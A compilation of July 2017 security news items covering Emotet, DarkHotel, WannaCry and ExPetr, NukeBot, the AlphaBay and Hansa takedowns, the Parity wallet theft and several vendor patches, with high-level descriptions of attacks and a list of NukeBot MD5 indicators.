In the attacks observed recently by Fidelis, Emotet has been used as a downloader for several other banking Trojans based on the victim’s geographical location.

The spreader component seen in attacks over the past month is designed to enumerate network resources in an effort to locate shares to which it can write a file and create a remote service. The service, named “Windows Defender System Service,” writes the malware to the disk and executes it.

If a shared resource is password-protected, the malware will try to guess credentials for user and administrator accounts by launching a dictionary attack.

Researchers pointed out that the network spreader component they have analyzed is packaged differently compared to the known Emotet modules, which could indicate that the spreader is a component used only by a specific group and not a direct piece of the malware.

“With the recent addition of spreading capabilities being added to ransomware it’s not at all surprising to see other malware families start to look into adding similar capabilities. It seems to be a common trend lately for malware developers to add in functionality based on what’s in the news which recently has been filled with all things wormable, which could mean this might be a continued trend for malware in the future,” said Fidelis’ Jason Reaves.

Fidelis has published a blog post containing technical details on the spreader component and indicators of compromise (IoC).


Hundreds of Java Flaws Patched by Schneider in Trio TView Software

22.7.2017 securityweek Vulnerebility

Energy management and automation solutions giant Schneider Electric was informed by a researcher that its Trio TView software uses a version of Java that was released in 2011 and is affected by hundreds of vulnerabilities.

Researcher Karn Ganeshen informed Schneider that the version of Java Runtime Environment (JRE) used in Trio TView, a management and diagnostics software for industrial radio systems, is outdated and contains numerous vulnerabilities.

JRE 1.6.0 update 27, released in August 2011, is plagued by more than 360 flaws, including security holes that over the past years have been exploited in attacks by both cybercriminals and state-sponsored threat actors. The list includes CVE-2015-4902, CVE-2015-2590 and CVE-2012-4681, all of which were zero-day vulnerabilities at some point.

The outdated version of Java is present in TView 3.27.0 and earlier. With the release of TView 3.29.0, Schneider updated the Java component to version 1.8.0 update 131, which Oracle released in mid-April 2017.

Ganeshen previously notified Schneider of several vulnerabilities, including ones affecting some of the company’s power meters.

Vulnerabilities in Schneider Electric PowerSCADA Anywhere and Citect Anywhere

Schneider has informed ICS-CERT that it has released patches for several medium and high severity vulnerabilities impacting its PowerSCADA Anywhere and Citect Anywhere.

The vulnerable applications are extensions of Citect SCADA, a high performance SCADA software for industrial process customers.

Versions 1.0 of PowerSCADA Anywhere and Citect Anywhere are affected by a high severity cross-site request forgery (CSRF) flaw that can be exploited to initiate “state-changing requests” by getting the targeted user to click on a specially crafted link.

The other vulnerabilities have been described as information exposure issues, use of outdated cipher suites, and a weakness that can be exploited to escape the application and launch other processes.

Patches for these security holes are included in version 1.1 of the affected products. Schneider has also provided a series of recommendations for hardening systems running PowerSCADA Anywhere and Citect Anywhere.


Tor Launches Bug Bounty Program — Get Paid for Hacking!
21.7.2017 thehackernews Security
With the growing number of cyber attacks and breaches, a significant number of companies and organisations have started Bug Bounty programs for encouraging hackers, bug hunters and researchers to find and responsibly report bugs in their services and get rewarded.
Following major companies and organisations, the non-profit group behind Tor Project – the largest online anonymity network that allows people to hide their real identity online – has finally launched a "Bug Bounty Program."
The Tor Project announced on Thursday that it joined hands with HackerOne to start a public bug bounty program to encourage hackers and security researchers to find and privately report vulnerabilities that could compromise the anonymity network.
HackerOne is a bug bounty startup that operates bug bounty programs for companies including Yahoo, Twitter, Slack, Dropbox, Uber, General Motors – and even the United States Department of Defense for Hack the Pentagon initiative.
Bug bounty programs are cash rewards gave by companies or organisations to white hat hackers and researchers who hunt for serious security vulnerabilities in their website or products and then responsibly disclose them.
The Tor Project announced its intention to launch a public bug bounty program in late December 2015 during a talk by the Tor Project at Chaos Communication Congress (CCC) held in Hamburg, Germany. However, it launched the invite-only bounty program last year.
The highest payout for the flaws has been kept $4,000 — bug hunters can earn between $2,000 and $4,000 for High severity vulnerabilities, between $500 and $2,000 for Medium severity vulnerabilities, and a minimum of $100 for Low severity bugs.
Moreover, less severe issues will be rewarded with a t-shirt, stickers and a mention in Tor's hall of fame.
"Tor users around the globe, including human rights defenders, activists, lawyers, and researchers, rely on the safety and security of our software to be anonymous online," Tor browser developer Georg Koppen said in a blog post. "Help us protect them and keep them safe from surveillance, tracking, and attacks."
The Tor Project is a non-profit organisation behind the Tor anonymizing network that allows any online user to browse the Internet without the fear of being tracked.
The Project first announced its plan to launch the bug bounty program weeks after it accused the FBI of paying the researchers of Carnegie Mellon University (CMU) at least $1 Million to help them Unmask Tor users and reveal their IP addresses, though FBI denies the claims.


Feds Seize AlphaBay and Hansa Markets in Major Dark-Web Bust
21.7.2017 thehackernews CyberCrime
It's finally confirmed — In a coordinated International operation, Europol along with FBI, DEA (Drug Enforcement Agency) and Dutch National Police have seized and taken down AlphaBay, one of the largest criminal marketplaces on the Dark Web.
But not just AlphaBay, the law enforcement agencies have also seized another illegal dark web market called HANSA, Europol confirmed in a press release today.
According to Europol, both underground criminal markets are "responsible for the trading of over 350,000 illicit commodities including drugs, firearms and cybercrime malware."
On July 4th, AlphaBay suddenly went down without any explanation from its administrators, which left its customers in panic. Some of them even suspected that the website's admins had pulled an exit scam and stole user funds.
However, last week it was reported that the mysterious shut down of the dark web marketplace was due to a series of raids conducted by the international authorities.
The raid also resulted in the arrest of Alexandre Cazes, a 26-year-old Canadian citizen who was one of the alleged AlphaBay's operators and was awaiting extradition to the US when a guard found him hanged in his jail cell the next day.
Now, Europol just announced that two of the largest criminal Dark Web markets—AlphaBay and Hansa— have shut down by the authorities, as the infrastructure "responsible for the trading of over 350 000 illicit commodities including drugs, firearms and cybercrime malware."
"This is an outstanding success by authorities in Europe and the US. The capability of drug traffickers and other serious criminals around the world has taken a serious hit today after a highly sophisticated joint action in multiple countries," Rob Wainwright, Europol Executive Director said.
"By acting together on a global basis the law enforcement community has sent a clear message that we have the means to identify criminality and strike back, even in areas of the Dark Web. There are more of these operations to come."
Feds Covertly Monitored Activities of Criminals Hansa Market
This is what made the operation more interesting.
Interesting — Feds Took Control Over Hansa Dark Web Site & Kept It Running for a Month to Covertly Monitor Activities of Criminals
The federal authorities revealed that they secretly took control over the Hansa market on 20th June 2017 and kept it running for at least a month in an effort to monitor the activities of vendors and buyers without their knowledge.
And here's the Icing on the cake — During the same period federal authorities purposely only took down AlphaBay, forcing their users to join the Hansa market for illegal trading and purchasing.
"We could identify and disrupt the regular criminal activity that was happening on Hansa market but also sweep up all of those new users that were displaced from AlphaBay and looking for a new trading platform for their ciminal activities," Rod Jay Rosenstein, the Deputy Attorney General for the DoJ, said today in a live press conference in Washington DC.
How One Simple Mistake Revealed AlphaBay Operator’s Identity
Cazes made the same mistake that most cyber criminals do which revealed his real identity and led to his arrest. He was using his personal email (Pimp_Alex_91@hotmail.com) to send out welcome & support emails to all members of his AlphaBay websites.
OPSEC Failure — One simple mistake revealed the identity of the AlphaBay operator & lead to his arrest.
The feds learned that the email address belonged to a Canadian man named Alexandre Cazes with the birth date October 19, 1991, and was working as president of a software company called EBX Technologies.
Cazes has been charged with a total of 16 counts, including:
1 count of conspiracy to engage in racketeering
1 count of conspiracy to distribute narcotics
6 counts of distribution of narcotics
1 count of conspiracy to commit identity theft
4 counts of unlawful transfer of false identification documents
1 count of conspiracy to commit access device fraud
1 count of trafficking in device making equipment
1 count of money laundering conspiracy
"Law enforcement authorities in the United States worked with numerous foreign partners to freeze and preserve millions of dollars’ worth of cryptocurrencies that were the subject of forfeiture counts in the indictment, and that represent the proceeds of the AlphaBay organization’s illegal activities," the DoJ says.
After the disappearance of Silk Road, AlphaBay emerged in 2014 and became a leader among dark web marketplaces for selling illicit goods from drugs to stolen credit card numbers, exploits, and malware.
Prior to its takedown, AlphaBay Market reached more than 200,000 customers and 40,000 vendors, with over 250,000 listings for illegal drugs and over 100,000 stolen and fraudulent identification documents and access devices, malware and other computer hacking tools.
Authorities believed that the dark websites like AlphaBay and Hansa were responsible for lost of many lives in America.
"Today, some of the most prolific drug suppliers use what is called the dark web, which is a collection of hidden websites that you can only access if you mask your identity and your location," Rosenstein said.
"One victim was just 18 years old when in February she overdosed on a powerful synthetic opioid which she had bought on AlphaBay. Grant Siever, only 13 years of age, a student at Treasure Mountain Junior High School, Utah, Park City. When he passed away, after overdosing on a synthetic opioid that had been purchased by a classmate on AlphaBay."
Like AlphaBay, Silk Road, the largest Dark Web market at that time, was also shut down after the law enforcement raided its servers in 2013 and arrested its founder Ross William Ulbricht, who has been sentenced to life in prison.
The feds also seized Bitcoins (worth $33.6 million, at that time) from the dark web site. Those Bitcoins were later sold in a series of auctions by the United States Marshals Service (USMS).


DarkHotel APT group leverages new methods to target politicians
21.7.2017 securityaffairs 
APT

According to Bitdefender, DarkHotel APT is back and it is targeting government employees with an interest in North Korea with a technique dubbed inexsmar.
According to the security firm Bitdefender, the DarkHotel APT is back and it is targeting government employees with an interest in North Korea with new techniques.

The hackers’ victims have been discovered in several countries, including North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, Taiwan, China, the United States, India, Mozambique, Indonesia and Germany.

The first Darkhotel espionage campaign was spotted by experts at Kaspersky Lab in late 2014, according to the researchers the APT group has been around for nearly a decade while targeting selected corporate executives traveling abroad. According to the

According to the experts, threat actors behind the Darkhotel campaign aimed to steal sensitive data from executives while they are staying in luxury hotels, the worrying news is that the hacking crew is still active.

The attackers appeared high skilled professionals that exfiltrated data of interest with a surgical precision and deleting any trace of their activity. The researchers noticed that the gang never go after the same target twice. The list of targets includes CEOs, senior vice presidents, top R&D engineers, sales and marketing directors from the USA and Asia traveling for business in the APAC region.

Security researchers believe the APT group members are Korean speakers.

The attackers leveraged several methods to hack into the target systems, including zero-day exploits and used as the attack vectors peer-to-peer (P2P) file sharing websites and hotel’s Wi-Fi.

Now the Darkhotel group was using new attack methods and an exploit leaked from Italian surveillance firm Hacking Team.

The attack technique used in recent attacks was dubbed Inexsmar and it was observed in targeted attacks against political figures.

“Our threat researchers have come across a very particular DarkHotel attack known as Inexsmar, which appears to mark a significant departure from the APT group’s traditional modus operandi. This sample dates back to September 2016 and seems to be used in a campaign that targets political figures rather than the usual corporate research and development personnel, CEOs and other senior corporate officials.” reads the analysis published by BitDefender.

“This attack uses a new payload delivery mechanism rather than the consacrated zero-day exploitation techniques, blending social engineering with a relatively complex Trojan to infect its selected pool of victims.”

Hackers spread a Trojan downloader via phishing emails, the malicious code is used to gather information on the infected device and sends it back to attackers. If the infected systems meet specific requirements a first stage downloader, disguised as a component of OpenSSL, is fetched. In this phase, the malicious code opens a document titled “Pyongyang e-mail lists – September 2016,” that contains email contacts for various organizations in Pyongyang.


The attack stops if the requirements are not satisfied, otherwise, another payload is delivered.

Unfortunately, at the time of the investigation, the C&C server was offline and researchers were not able to collect further details about the attack.

The use of a multi-stage downloader represents the major improvement compared to the use of exploits because it allows attackers to improve the distribution and the update of the malware.


Apple Patches BroadPwn Bug in iOS 10.3.3
21.7.2017 Threapost Apple
Apple released iOS 10.3.3 Wednesday, which serves as a cumulative update that includes patches for multiple vulnerabilities including the high-profile BroadPwn bug that allowed an attacker to seize control of a targeted iOS device.

BroadPwn was revealed earlier this month as a flaw in Broadcom Wi-Fi chipsets used in Apple and Android devices. Apple said the vulnerability affected the iPhone 5 to iPhone 7, the fourth-generation iPad and later versions, and the iPod Touch 6th generation.

Exodus Intelligence discovered the flaw (CVE-2017-3544), which was patched earlier this month on Android when Google released its July Android Security Bulletin. Nitay Artenstein, the researcher with Exodus Intelligence who discovered the vulnerability, is scheduled to do a talk on the vulnerability at Black Hat next week.

Yesterday’s Apple security updates also included fixes for its tvOS, iTunes and iCloud for Windows, the Safari browser, watchOS and macOS Sierra.

In addition to patching the BroadPwn vulnerability, Apple addressed 13 arbitrary code execution vulnerabilities tied to everything from a buffer overflow bug found in the Contacts (CVE-2017-7062) app and a memory corruption issue (CVE-2017-7009) in the CoreAudio component of the OS.

The open source web browser engine WebKit was also patched by Apple. One WebKit vulnerability (CVE-2017-7011) allowed an attacker to use a malicious website that could lead to an “address bar spoofing” attack. A second (CVE-2017-7019) WebKit memory corruption issue allowed an attacker to maliciously craft web content that could lead to arbitrary code execution on a targeted iOS device.

“The issue involves the ‘WebKit Page Loading’ component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site,” wrote Apple regarding CVE-2017-7019.

On Wednesday, Apple also released patches for macOS Sierra 10.12.6, as well as Security Update 2017-003 for El Capitan and Security Update 2017-003 for Yosemite. Four CVEs were associated with a memory corruption issue tied to all macOS operating systems. The vulnerability (CVE-2017-7031) is an “issue that involves the ‘Foundation’ component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted file,” according to Apple.

Apple also released iCloud for Windows 6.2.2 that addressed almost a dozen CVEs tied to bugs found by Google Project Zero researchers. Researcher Ivan Fratric, with Google Project Zero, is behind eight of the CVEs. Most of the bugs he found are related to iCloud memory corruption issues in WebKit. The flaw allowed the processing of maliciously crafted web content within the app that could lead to arbitrary code execution.

Apple’s watchOS 3.2.3 release snuffed out a number of bugs including one interesting vulnerability tied to the operating system’s libxml2 library, responsible for manipulating XML content, that impacted all watch models. “Parsing a maliciously crafted XML document may lead to disclosure of user information,” described Apple (CVE-2017-7013).

A memory corruption bug was patched in Apple’s tvOS (CVE-2017-7008) that could lead to arbitrary code execution if a maliciously crafted movie file was played on the device, Apple said.


Defenders Gaining on Attackers, But Attacks Becoming More Destructive: Cisco

21.7.2017 securityweek Attack

Cisco Publishes 2017 Midyear Cybersecurity Report

Cisco's just-released Midyear Cybersecurity Report (PDF) draws on the accumulated work of the Cisco Security Research members. The result shows some improvement in industry's security posture, but warns about the accelerating pace of change and sophistication in the global cyber threat landscape.

Improvements can be demonstrated by the mean 'time to detect.' When monitoring first began in November 2015, this stood at 39 hours; but it narrowed to about 3.5 hours in the period from November 2016 to May 2017.

Against this, however, Cisco warns that the pace of technology is creating an ever-increasing threat surface that needs to be protected. "Lack of visibility into dynamic IT environments," notes the report, "the risks presented by "shadow IT," the constant barrage of security alerts, and the complexity of the IT security environment are just some reasons resource-strapped security teams struggle to stay on top of today's evasive and increasingly potent cyber threats."

The report analyzes existing threats, comments on evolving attack methodologies, and makes two worrying predictions about the increasing ruthlessness of attackers. The first prediction is that any apparent current lull in the use of IoT-based large-scale DDoS is no reason for optimism. "Botnet activity in the IoT space suggests some operators may be focused on laying the foundation for a wide-reaching, high-impact attack that could potentially disrupt the Internet itself," says Cisco.

Cisco's second concern is over the potential evolution of ransomware into a threat designed to lock down systems and destroy data as part of the attack process. It calls this threat, Destruction of Service (DeOS); and we may have already seen its nascence in NotPetya .

In financial value to the attacker, Cisco points out that ransomware is far less fruitful than the business email compromise (BEC) attack. "US$5.3 billion was stolen due to BEC fraud between October 2013 and December 2016. In comparison, ransomware exploits took in US$1 billion in 2016," says the report.

"BEC scams are aimed at big targets," it explains, "and big targets have fallen victim to them, even though such organizations may have mature threat defenses and safeguards against fraud. Both Facebook and Google have been victims of BECs and wire fraud." The attack's success rate is easily explained. "Because BEC messages don't contain malware or suspect links, they can usually bypass all but the most sophisticated threat defense tools."

Cisco highlights five current trends in malware evolution that have been evident in the first six months of 2017. The first is that attackers are using distribution systems that require users to take some type of positive action. An example would be a password-protected malicious document (with the password conveniently provided to the user in the body of the email). "When placed in a sandbox environment," says Cisco "these attachments do not show any evidence of being malicious, so they are forwarded to the user."

The second trend is that ransomware authors are creating malware quickly, easily, and cost-effectively by using open-source codebases, like Hidden Tear and EDA2, which publicly release ransomware code for "educational" purposes.

The third is the continuing growth of ransomware-as-a-service (RaaS) platforms, such as Satan. These, says the report, "are ideal for lazy adversaries who want to enter the ransomware market and launch a successful campaign without having to perform any coding or programming."

"Ransomware as a service," comments David Kennerley, director of threat research at Webroot, "is without a doubt one of the biggest threats facing organizations across industries today, and protection against ransomware is currently a question of economics. Due to poor security practices and culture in many cases it is often seen to be cheaper to pay the ransom to get the data back than to use internal recovery procedures."

But he does not recommend this approach. "No matter how tempting it might be, if any other option exists, however challenging, companies should never negotiate or concede to the criminal and pay the ransom. The danger with paying the ransom is there's no guarantee they'll recover the encrypted files. By paying you are only fueling the ransomware economy – and what now stops you being targeted again in future cyberattacks?"

Cisco's fourth malware trend is the growing prevalence of fileless or memory-resident malware. "It relies on PowerShell or WMI to run the malware completely in memory without writing any artifacts to the file system or registry, unless the attacker wants to put persistent mechanisms in place." Because there is no malware on the disk, there is no file to detect.

The fifth trend is that attackers are relying more on anonymized and decentralized infrastructures for obfuscation in their command and control. Tor bridging services are an example -- such as Tor2web, a proxying service that allows systems on the Internet to access things that are hosted within Tor, without requiring the installation of a local Tor client application.

In most of these developments, there is a constant: the economics of hacking has turned a corner. "The modern hacking community," says the report, "is benefiting from quick and easy access to a range of useful and low-cost resources."

Cisco notes that a decline in the use of exploit kits to deliver malware has coincided with an increase in spam levels. "Adversaries who had relied heavily on exploit kits to deliver ransomware," it explains, "are turning to spam emails, including those containing macro-laden malicious documents that can defeat many sandboxing technologies because they require user interaction to infect systems and deliver payloads."

Cisco does not expect exploit kits to disappear, but "other factors, such as the greater difficulty of exploiting vulnerabilities in files built with Adobe Flash technology, may be slowing the resurgence."

One threat vector given special mention is PUP-style spyware, which is often given little attention by defenders. Cisco studied three common families, and found at least one present within 20% of 300 companies it sampled. The three families are Hola, RelevantKnowledge, and DNSChanger/DNS Unlocker. "Although operators may market spyware as services designed to protect or otherwise help users," warns the report, "the true purpose of the malware is to track and gather information about users and their organizations -- often without users' direct consent or knowledge. Spyware companies are known to sell or provide access to the data they collect, allowing third parties to harvest information with relative anonymity. That information can be used to identify critical assets, map internal infrastructures in organizations, and orchestrate targeted attacks."

Timely patching continues to be an issue. "In late 2016," says the report, "Cisco threat researchers discovered and reported three remote code-execution vulnerabilities in Memcached servers. A scan of the Internet a few months later revealed that 79 percent of the nearly 110,000 exposed Memcached servers previously identified were still vulnerable to the three vulnerabilities because they had not been patched."

The overall picture presented in Cisco's 2017 Midyear Cybersecurity Report is a mixed bag. There is some good news. "Much of the research," it concludes, "shows that defenders not only have been gaining ground on adversaries, but also developing a much better understanding of how and where threat actors operate."

But against this, it adds, attackers are evolving more destructive attacks (such as DeOS and massive scale IoT-based DDoS attacks). "That is why it has never been more important for organizations to make cybersecurity a top priority."


Hacker Steals $30 Million in Ethereum from Parity Wallets

21.7.2017 securityweek Hacking

A hacker was allegedly able to exploit a vulnerability in Ethereum wallet client Parity and steal over $30 million worth of crypto-currency.

Because of a security flaw in the Parity Ethereum client, the hacker managed to steal 153,000 Ether from multi-sig wallets created with Parity clients 1.5. Parity has issued a security alert, but updated it today to reveal that the vulnerability has been already resolved.

According to the company, the vulnerability was discovered in “Parity Wallet's variant of the standard multi-sig contract” and affects all users “with assets in a multi-sig wallet created in Parity Wallet prior to 19/07/17 23:14:56 CEST.”

Prior to releasing the fix, Parity suggested users should “immediately move assets contained in the multi-sig wallet to a secure address.”

In fact, it appears that a group of security researchers and members of the Ethereum Project decided help moving the crypto-currency from the vulnerable wallets and took matter into their own hands by exploiting the same vulnerability to drain as many multi-sig wallets as possible.

“White Hat Group(s) were made aware of a vulnerability in a specific version of a commonly used multisig contract. This vulnerability was trivial to execute, so they took the necessary action to drain every vulnerable multisig they could find as quickly as possible. Thank you to the greater Ethereum Community that helped finding these vulnerable contracts,” the group notes on their account.

The group managed to drain over 377,116 Ether to their wallet, which is worth over $75 million. They also note that affected users will be refunded as soon as a secure multi sig wallet is created for them.

“If you hold a multisig contract that was drained, please be patient. They will be creating another multisig for you that has the same settings as your old multisig but with the vulnerability removed and will return your funds to you there,” the group says.

The hacker, on the other hand, has already started to move the stolen assets from the initial Ethereum wallet. 70,000 Ether, worth around $14 million, was already moved to seven different wallets, each containing 10,000 Ether now.

Ethereum’s value dropped from around $230 at around $200 following the hack.

Earlier this week, an unknown actor managed to hack the CoinDash official website during the company’s Token Sale and stole $7 million in Ethereum by replacing the company’s legitimate address with their own.

In early July, hackers managed to hijack a computer belonging to an employee of Bithumb, one of the world’s largest cryptocurrency exchanges, and stole significant amounts of Bitcoin and Ethereum.

“This latest incident has serious ramifications. In fact, ETH price has actually taken a dip, and is likely due to the uncertainty around this breach. Hackers exploited a vulnerability in multi-sig wallets from Parity – drastically different from the ICO CoinDash hack that happened earlier this week,” Tyler Moffitt, Senior Threat Research Analyst at cybersecurity firm Webroot, told SecurityWeek in an emailed comment.

Last year, a hack on the Ethereum holdings of DAO (a decentralized and virtual organization designed to provide funds for new projects) also resulted in a drop in the digital currency’s value.

“The key takeaway from this hack is that we're still exploring the Ethereum space and wallet security is more important than ever. As a threat researcher, I personally recommend hardware or native wallets (desktop wallets); they are the most secure, as you are in control of any transaction. Do NOT store lots of currency in exchanges that control your private address. Only use them to make trades then back out to safe addresses,” Moffitt concluded.


A King’s Ransom It is Not

20.7.2017 Kaspersky Ransomware
Hidden motivations in separate but similar destructive events

EXPETR RANSOMWARE SHADOW BROKERS VULNERABILITIES AND EXPLOITS WANNACRY
The first half of 2017 began with two intriguing ransomware events, both partly enabled by wormable exploit technology dumped by a group calling themselves “The ShadowBrokers”. These WannaCry and ExPetr ransomware events are the biggest in the sense that they spread the quickest and most effectively of known ransomware to date. With this extraordinary effectiveness and speed, one might expect that at least one of the groups would walk away with a very large cash haul. But that is not the case.

King Richard the I, held for a King’s Ransom of 100,000 marks. The largest ransom in known history. At the time, twice England’s GDP
Both of these incidents were carried out by two very different groups that appear to have been capable of obtaining, but minimally interested in, a king’s ransom. This missing financial motivation is strange, considering the royal capabilities of the exploits that they used to deploy their ransomware.

Also unusual, and preceding and relevant to these 2017 ransomware events, is that groups carrying out aggressive, destructive acts were more straightforward about the matter. We first posted our destructive BlackEnergy (BE) findings in 2014, along with discussion of their “dstr” plugin and odd DDoS features. Allegedly BE later took down large parts of the electrical grid in Ukraine for almost a half day. Later we described the Destover components used in the worm-enabled, destructive, politically motivated Sony incident. And Shamoon and StonedDrill have been pushed in the Middle East around turbulent political situations as well. These components were all wiper technology, delivered in a very intentional and destructive manner. It’s interesting that these spectacles all coincided with large political events and interests. So this new need to cloak their destructive activity or sabotage is an interesting shared change in tactics.

WannaCry Deployment

WannaCry deployment efforts began much earlier than has been publicly discussed. Our private report subscribers received early information that the attackers were spearphishing targets globally by at least March 14th. These messages contained links to files hosted at file sharing services. When clicked, the link led to what recipients thought were resumes related to job applications with a filename “Resume.zip” containing “Job Inquiry – Resume 2017.exe”.

This executable maintained a modified Adobe pdf file icon, and dropped both more malware (droppers and downloader chains that later led to WannaCry installations) and immediately opened decoy job applications. Here is an image of one of the decoys. While we couldn’t find it online, it may be a rip of a legitimate document:


Most of these targets were soft (likely to run the exe and likely did not have advanced network defense programs in place), their locations dispersed globally, and their organizations’ profiles inconsistent.

The group attempted to deploy the first version of WannaCry ransomware to these and various other targets over the next two months, with no success or observable effort to collect bitcoin from this activity. And, even after the ETERNALBLUE spreader exploit with the DOUBLEPULSAR code and its oddly mistaken kill switch likely was hastily added to the ransomware, the attackers did not focus much more development or attention on collecting bitcoin. At one point, the actor sent a light set of messages encouraging users to pay BTC to their wallet.

This sort of inexpensive, two month long activity also may tell us a bit about the actor, their capabilities, and their interests — slow, practical, and somewhat hiding their interests in a very odd way.

While the Sony incident demonstrated the theft and use of stolen credentials and reliable lateral movement, even that credential theft itself required little effort on the part of the attackers. Entire spreadsheets of admin passwords were left open on network shares. Bizarre permission configurations were maintained within the network. The actor had little to do in order to spread a wiper with its audio-video payload to lob oddball jibes at Sony and its executives, and post pastebin threats at movie-goers and share the company’s dirty laundry over p2p. Understanding and co-opting a software update infrastructure was unnecessary in the Sony incident. But a low-tech worming component was also built into the toolset, highly effective most likely because of a low security environment, not because of a previously 0day component.

ExPetr Deployment

ExPetr deployment was sharp, advanced, and technically agile. The group precisely targeted a major accounting software supplier to Ukrainian organizations. They also compromised a news website in UA to further waterhole targets outside the reach of the M.E.Doc network.

Once inside the M.E.Doc network, they gained access to the software update infrastructure and used that access to further steal credentials within target customer organizations. It’s interesting that delivery of the original poisoned installer occurred in April, and the large scale wiping event occurred much later. Also, not all systems receiving attempted Telebot deployments later received an ExPetr deployment. And, not all systems receiving attempted ExPetr deployments had previously received an attempted Telebot deployment.

Oddly, the two month delay in delivering the worm-enabled ExPetr variant is unexpectedly similar to the delay we saw with WannaCry. Later, they delivered the WMI/PsExec/ETERNALBLUE/ETERNALROMANCE-weaponized ExPetr sabotage variant. But in a substantial advance from Wannacry, even if Windows systems were patched, the attackers had stolen credentials for effective lateral movement and could wipe/crypt target systems. This addition also tells us that this attacker wanted to focus on effectively operating the confines of Ukrainian-connected organizations. The worming components also didn’t generate random network connections outside of the target networks. The variant included both native win64 and win32 MSVC-compiled Mimikatz-inspired components dropped to disk and run, stealing passwords for maximum privilege and spread, like those for domain admin and various network service accounts.

The ExPetr attackers apparently did not return with widely spread taunts or messages for their targets, or drag out the incident by requesting BTC transactions for disk decryption.

Comparison Table

WannaCry ExPetr
Spearphishing Yes – dependent Minimal (if any) – reported initial entry
Waterholing No Yes
Supply side server compromise No Yes
Capable of developing wormable exploit No Seemingly not
Initial activity March 14 April 15
Ransomware/wiper spread date May 12 (two months later) June 27 (two months later)
Targeting Global and opportunistic Focused primarily within one country
ETERNALBLUE Yes Yes
ETERNALROMANCE No Yes
DOUBLEPULSAR Yes Yes (minor modification)
Advanced credential theft and spreading No Yes
Advanced anti-malware evasion No Yes
Wiper functionality No Yes
Properly implemented crypto No Yes
Rushed mistakes Unregistered kill switch domain Not really – possibly MBR overwrite algorithm (unlikely)
Financial draw No Minimal
Code sharing with other projects Yes Yes
The recent ETERNALBLUE/ETERNALROMANCE/DOUBLEPULSAR-enabled WannaCry and ExPetr incidents share similarities. Not in the sense that they were carried out by the same actor; it is most likely that they were not. One APT was rushed, opportunistic, not as technically capable as the other, while the other APT was practical, agile, and focused. But we are at the start of a trend emerging for this unusual tactic – APT camouflage destructive targeted activity behind ransomware.


The NukeBot banking Trojan: from rough drafts to real threats
20.7.2017 Kaspersky
Virus

This spring, the author of the NukeBot banking Trojan published the source code of his creation. He most probably did so to restore his reputation on a number of hacker forums: earlier, he had been promoting his development so aggressively and behaving so erratically that he was eventually suspected of being a scammer. Now, three months after the source code was published, we decided to have a look at what has changed in the banking malware landscape.

NukeBot in the wild

The publication of malware source code may be nothing new, but it still attracts attention from across the IT community and some of that attention usually goes beyond just inspecting the code. The NukeBot case was no exception: we managed to get our hands on a number of compiled samples of the Trojan. Most of them were of no interest, as they stated local subnet addresses or ‘localhost/127.0.0.1’ as the C&C address. Far fewer samples had ‘genuine’ addresses and were ‘operational’. The main functionality of this banking Trojan is to make web injections into specific pages to steal user data, but even from operational servers we only received ‘test’ injections that were included in the source code as examples.

Test injections from the NukeBot source code
Test injections from the NukeBot source code
The NukeBot samples that we got hold of can be divided into two main types: one with plain text strings, and the other with encrypted strings. The test samples typically belong to type 1, so we didn’t have any problems extracting the C&C addresses and other information required for analysis from the Trojan body. It was a bit more complicated with the encrypted versions – the encryption keys had to be extracted first and only after that could the string values be established. Naturally, all the above was done automatically, using scripts we had developed. The data itself is concentrated in the Trojan’s one and only procedure that is called at the very beginning of execution.

A comparison of the string initialization procedure in plain text and with encryption.
A comparison of the string initialization procedure in plain text and with encryption.
Decryption (function sub_4049F6 in the screenshot) is performed using XOR with a key.

Implementation of string decryption in Python
Implementation of string decryption in Python
In order to trigger web injections, we had to imitate interaction with C&C servers. The C&C addresses can be obtained from the string initialization procedure.

When first contacting a C&C, the bot is sent an RC4 key which it uses to decrypt injections. We used this simple logic when implementing an imitation bot, and managed to collect web injections from a large number of servers.

Initially, the majority of botnets only received test injects that were of no interest to us. Later, however, we identified a number of NukeBot’s ‘combat versions’. Based on an analysis of the injections we obtained, we presume the cybercriminals’ main targets were French and US banks.

Example of 'combat-grade' web injections
Example of ‘combat-grade’ web injections
Of all the Trojan samples we obtained, 2-5% were ‘combat-grade’. However, it is still unclear if these versions were created by a few motivated cybercriminals and the use of NukeBot will taper off soon, or if the source code has fallen into the hands of an organized group (or groups) and the number of combat-grade samples is set to grow. We will continue to monitor the situation.

We also managed to detect several NukeBot modifications that didn’t have web injection functionality, and were designed to steal mail client and browser passwords. We received those samples exclusively within droppers: after unpacking, they downloaded the required utilities (such as ‘Email Password Recovery’) from a remote malicious server.

Kaspersky Lab products detect the banking Trojans of the NukeBot family as Trojan-Banker.Win32.TinyNuke. Droppers containing this banking Trojan were assigned the verdict Trojan-PSW.Win32.TinyNuke.

MD5

626438C88642AFB21D2C3466B30F2312
697A7037D30D8412DF6A796A3297F37E
031A8139F1E0F8802FF55BACE423284F
93B14905D3B8FE67C2D552A85F06DEC9
A06A16BD77A0FCB95C2C4321BE0D2B26
0633024162D9096794324094935C62C0
9E469E1ADF9AAE06BAE6017A392B4AA9
078AA893C6963AAC76B63018EE4ECBD3
44230DB078D5F1AEB7AD844590DDC13E
FAF24FC768C43B95C744DDE551D1E191
8EBEC2892D033DA58A8082C0C949C718
6DC91FC2157A9504ABB883110AF90CC9
36EB9BDEFB3899531BA49DB65CE9894D
D2F56D6132F4B6CA38B906DACBC28AC7
79E6F689EECB8208869D37EA3AF8A7CA
9831B1092D9ACAEB30351E1DB30E8521


U.S., European Police Say 'Dark Web' Markets Shut Down

20.7.2017 securityweek CyberCrime

Washington - US and European police on Thursday announced the shutdown of two huge "dark web" marketplaces that allowed the anonymous online trade of drugs, hacking software and guns.

US Attorney General Jeff Sessions said underground websites AlphaBay and Hansa had tens of thousands of sellers of deadly drugs like fentanyl and other illicit goods serving more than 200,000 customers worldwide.

"This case, pursued by dedicated agents and prosecutors, says you are not safe, you cannot hide. We will find you, dismantle your organization and network, and we will prosecute you," Sessions said in a warning to dark web entrepreneurs. The announcement came three weeks after AlphaBay stopped functioning with no explanation.

On July 5, the Canadian national who ran AlphaBay, Alexandre Cazes, was arrested in Thailand. Earlier this week, Cazes was found dead in his Thai police cell, with police saying he apparently hanged himself with a towel.

AlphaBay's shutdown sent traffic flooding into the smaller Hansa marketplace.

